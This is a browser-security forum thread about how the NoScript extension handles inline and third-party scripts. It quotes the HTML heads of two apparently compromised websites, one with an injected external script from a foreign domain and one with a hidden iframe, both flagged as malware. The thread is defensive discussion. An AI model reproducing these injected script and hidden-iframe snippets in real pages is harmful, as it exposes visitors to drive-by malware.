Inline Script Blockage

[therube]

Is the script here (jquery.js) considered "inline" script?
And to be clear, it is blocked by NoScript, by default, even if the primary domain (vikingimporting.com) is allowed?

Code: Select all

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> 
<title>Viking Importing</title><script src=http://exero.eu/catalog/jquery.js></script><title></title>
<base href="http://www.vikingimporting.com/">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>

MALWARE WARNING: h t t p ://w w w.vikingimporting.com/

[therube]

And while we're here ...

Code: Select all

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Mammoth Equipment<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>
<base href="http://mammothequipment.com/">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>

The IFRAME is blocked - if Options | Embeddings | Forbid <IFRAME> is enabled?
And even if it were not, script from willysy.com would not run unless it were specifically allowed?

MALWARE WARNING: h t t p :// mammothequipment.com/

[therube]

Inline scripts are blocked by default on non-whitelisted sites.
You cannot disable them selectively on whitelisted sites, if that's what you're asking for, but you can modify their execution environment to "cripple" them or otherwise change their behavior by writing your own page-level script surrogates.

http://forums.informaction.com/viewtopi ... 936#p34936

So explain further, because I'm still not clear.

I have not allowed vikingimporting.com.
Because of that, scripts from exero.eu will not run.
Though that is always the case, unless I have specifically allowed exero.eu?

Will "inlined" exero.eu run from vikingimporting.com, if vikingimporting.com is NOT allowed, but exero.eu has been Allowed?
Yes, I think it will? At least plugins (Flash) may work that way?

Now, if I allow vikingimporting.com, then ... ?
Then exero.eu ... will run, even though not specifically Allowed? And that is dangerous.

Explain further or clear my misunderstanding if you would.
Thanks.

[therube]

And is this the same, Ads beng served with ads sites blocked.

[Thrawn]

Is the script here (jquery.js) considered "inline" script?

No.

Inline script is when you define the JavaScript within the page itself, rather than including a link to an external script file.

Code: Select all

<html>
<head>
<script type="text/javascript">
  alert("Hello world!");
</script>

And NoScript blocks inline scripts if the domain that they come from (ie the domain of the page you're on) is blocked.